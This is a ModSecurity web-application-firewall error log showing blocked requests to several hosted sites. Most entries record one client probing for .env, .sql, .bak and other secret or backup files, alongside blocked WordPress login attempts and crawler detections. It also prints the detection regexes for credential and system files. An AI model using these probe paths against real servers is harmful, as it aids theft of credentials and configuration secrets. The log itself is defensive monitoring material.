[Tue May 26 19:55:49.583902 2026] [security2:error] [pid 93576:tid 93808] [client 64.233.173.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahWtbGDRMqfxdEDkoszcDAAAAGA"]
[Tue May 26 19:55:49.592266 2026] [security2:error] [pid 93868:tid 94321] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sys/.env"] [unique_id "ahWtbUqK9k_ZUB2Vp25X-AAAAc4"]
[Tue May 26 19:55:49.759816 2026] [security2:error] [pid 93868:tid 94381] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apache/.env"] [unique_id "ahWtbUqK9k_ZUB2Vp25X_QAAAgo"]
[Tue May 26 19:55:49.891957 2026] [security2:error] [pid 93868:tid 94284] [client 218.152.33.180:61233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.33.152.218.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtbUqK9k_ZUB2Vp25X-wAAAak"], referer: https://anujtradingco.com
[Tue May 26 19:55:51.459007 2026] [security2:error] [pid 93868:tid 94339] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/newsite/.env"] [unique_id "ahWtb0qK9k_ZUB2Vp25YSAAAAeA"]
[Tue May 26 19:55:51.463473 2026] [security2:error] [pid 93576:tid 93805] [client 218.152.33.180:61366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtb2DRMqfxdEDkoszcNwAAAF0"], referer: https://anujtradingco.com
[Tue May 26 19:55:51.648434 2026] [security2:error] [pid 93576:tid 93712] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtb2DRMqfxdEDkoszcNQAAAAA"]
[Tue May 26 19:55:52.470990 2026] [security2:error] [pid 93868:tid 94292] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ch8a-mytodo/.env"] [unique_id "ahWtcEqK9k_ZUB2Vp25YeAAAAbE"]
[Tue May 26 19:55:54.651719 2026] [security2:error] [pid 93868:tid 94274] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtckqK9k_ZUB2Vp25YwwAAAZ8"]
[Tue May 26 19:55:54.672650 2026] [security2:error] [pid 93868:tid 94337] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/phpinfo.php.backup.bak"] [unique_id "ahWtckqK9k_ZUB2Vp25Y2AAAAd4"]
[Tue May 26 19:55:54.841501 2026] [security2:error] [pid 93868:tid 94310] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/debug.sql"] [unique_id "ahWtckqK9k_ZUB2Vp25Y2wAAAcM"]
[Tue May 26 19:55:55.008975 2026] [security2:error] [pid 93868:tid 94368] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/srv/www/html/.env"] [unique_id "ahWtc0qK9k_ZUB2Vp25Y4gAAAf0"]
[Tue May 26 19:55:55.177192 2026] [security2:error] [pid 93868:tid 94353] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/administration/.env.bak"] [unique_id "ahWtc0qK9k_ZUB2Vp25Y6AAAAe4"]
[Tue May 26 19:55:55.494179 2026] [security2:error] [pid 93868:tid 94327] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtc0qK9k_ZUB2Vp25Y8wAAAdQ"]
[Tue May 26 19:55:55.494205 2026] [security2:error] [pid 93868:tid 94327] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtc0qK9k_ZUB2Vp25Y8wAAAdQ"]
[Tue May 26 19:55:55.494699 2026] [security2:error] [pid 93868:tid 94379] [client 65.109.156.37:62748] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWtc0qK9k_ZUB2Vp25Y8QAAAgg"]
[Tue May 26 19:55:55.909545 2026] [security2:error] [pid 93868:tid 94301] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtc0qK9k_ZUB2Vp25ZBAAAAbo"]
[Tue May 26 19:55:55.909571 2026] [security2:error] [pid 93868:tid 94301] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtc0qK9k_ZUB2Vp25ZBAAAAbo"]
[Tue May 26 19:55:55.910178 2026] [security2:error] [pid 93868:tid 94339] [client 65.109.156.37:62922] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWtc0qK9k_ZUB2Vp25ZAgAAAeA"]
[Tue May 26 19:55:55.989932 2026] [security2:error] [pid 93868:tid 94333] [client 113.186.216.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtc0qK9k_ZUB2Vp25Y-QAAAdo"]
[Tue May 26 19:55:56.557001 2026] [security2:error] [pid 93576:tid 93647] [remote 18.209.220.99:15260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtdGDRMqfxdEDkoszchQAAEUM"]
[Tue May 26 19:55:56.697293 2026] [security2:error] [pid 93868:tid 94297] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/crm/.env"] [unique_id "ahWtdEqK9k_ZUB2Vp25ZKwAAAbY"]
[Tue May 26 19:55:56.790446 2026] [security2:error] [pid 93868:tid 94273] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtdEqK9k_ZUB2Vp25ZHAAAAZ4"]
[Tue May 26 19:55:57.302703 2026] [security2:error] [pid 93868:tid 94160] [remote 199.247.4.24:40276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtdUqK9k_ZUB2Vp25ZQQAB1Eg"]
[Tue May 26 19:55:57.715885 2026] [security2:error] [pid 93868:tid 94385] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/token.old"] [unique_id "ahWtdUqK9k_ZUB2Vp25ZUAAAAg4"]
[Tue May 26 19:55:58.032454 2026] [security2:error] [pid 93868:tid 94172] [remote 173.212.245.56:33810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtdUqK9k_ZUB2Vp25ZUgABsU8"]
[Tue May 26 19:55:58.221598 2026] [security2:error] [pid 93868:tid 94355] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tracing/.env"] [unique_id "ahWtdkqK9k_ZUB2Vp25ZXgAAAfA"]
[Tue May 26 19:55:58.558405 2026] [security2:error] [pid 93868:tid 94284] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel.log~~.bak"] [unique_id "ahWtdkqK9k_ZUB2Vp25ZZwAAAak"]
[Tue May 26 19:55:58.894461 2026] [security2:error] [pid 93868:tid 94300] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/.env"] [unique_id "ahWtdkqK9k_ZUB2Vp25ZcwAAAbk"]
[Tue May 26 19:55:58.948303 2026] [security2:error] [pid 93868:tid 94186] [remote 51.195.244.242:42670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "krishnawoodworks.com"] [uri "/robots.txt"] [unique_id "ahWtdkqK9k_ZUB2Vp25ZdAAB4lc"]
[Tue May 26 19:55:58.948514 2026] [security2:error] [pid 93868:tid 94341] [client 51.195.244.242:42670] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "krishnawoodworks.com"] [uri "/robots.txt"] [unique_id "ahWtdkqK9k_ZUB2Vp25ZdAAB4lc"]
[Tue May 26 19:55:58.953006 2026] [security2:error] [pid 93868:tid 94368] [client 114.119.146.255:62321] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahWtdkqK9k_ZUB2Vp25ZdQAAAf0"], referer: http://newdental.com.co/?ucci/3351991424566851l13a/aafcbg20148a.hulloa
[Tue May 26 19:55:59.265325 2026] [security2:error] [pid 93868:tid 94189] [remote 173.212.245.56:33810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtd0qK9k_ZUB2Vp25ZfAAB8lk"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:55:59.601926 2026] [security2:error] [pid 93868:tid 94195] [remote 46.20.146.46:41628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWtd0qK9k_ZUB2Vp25ZhAABs1w"]
[Tue May 26 19:55:59.754970 2026] [security2:error] [pid 93576:tid 93736] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtd2DRMqfxdEDkoszcuAAAABg"]
[Tue May 26 19:56:00.027199 2026] [security2:error] [pid 93576:tid 93655] [remote 18.209.220.99:15260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtd2DRMqfxdEDkoszcvwAAdUs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:56:00.077978 2026] [security2:error] [pid 93868:tid 94282] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wordpress.sql"] [unique_id "ahWteEqK9k_ZUB2Vp25ZlQAAAac"]
[Tue May 26 19:56:00.387193 2026] [security2:error] [pid 93576:tid 93656] [remote 54.39.89.239:40030] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "krishnawoodworks.com"] [uri "/"] [unique_id "ahWteGDRMqfxdEDkoszcwQAAEUw"]
[Tue May 26 19:56:00.387378 2026] [security2:error] [pid 93576:tid 93729] [client 54.39.89.239:40030] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "krishnawoodworks.com"] [uri "/"] [unique_id "ahWteGDRMqfxdEDkoszcwQAAEUw"]
[Tue May 26 19:56:00.414938 2026] [security2:error] [pid 93868:tid 94355] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.c9/metadata/environment/.env"] [unique_id "ahWteEqK9k_ZUB2Vp25ZmgAAAfA"]
[Tue May 26 19:56:00.683550 2026] [security2:error] [pid 93868:tid 94244] [remote 46.20.146.46:41628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWteEqK9k_ZUB2Vp25ZnQABpnY"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 19:56:00.747475 2026] [security2:error] [pid 93868:tid 94066] [remote 154.66.198.148:14348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWteEqK9k_ZUB2Vp25ZmwABvBY"]
[Tue May 26 19:56:00.923465 2026] [security2:error] [pid 93868:tid 94299] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/invitations/.env"] [unique_id "ahWteEqK9k_ZUB2Vp25ZpAAAAbg"]
[Tue May 26 19:56:01.260443 2026] [security2:error] [pid 93868:tid 94309] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/kubernetes/configmap.yml.bak"] [unique_id "ahWteUqK9k_ZUB2Vp25ZtAAAAcI"]
[Tue May 26 19:56:02.608221 2026] [security2:error] [pid 93576:tid 93756] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/group/.env"] [unique_id "ahWtemDRMqfxdEDkoszc2AAAACw"]
[Tue May 26 19:56:02.654454 2026] [security2:error] [pid 93868:tid 94353] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtekqK9k_ZUB2Vp25ZxQAAAe4"]
[Tue May 26 19:56:02.765768 2026] [security2:error] [pid 93868:tid 94322] [client 157.39.65.90:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtekqK9k_ZUB2Vp25Z0AAAAc8"]
[Tue May 26 19:56:02.775821 2026] [security2:error] [pid 93576:tid 93808] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/prestashop/.env"] [unique_id "ahWtemDRMqfxdEDkoszc2QAAAGA"]
[Tue May 26 19:56:03.282955 2026] [security2:error] [pid 93576:tid 93768] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/log/.env"] [unique_id "ahWte2DRMqfxdEDkoszc3wAAADg"]
[Tue May 26 19:56:03.451287 2026] [security2:error] [pid 93576:tid 93742] [client 185.177.72.53:23954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer.inc.php.bak"] [unique_id "ahWte2DRMqfxdEDkoszc4AAAAB4"]
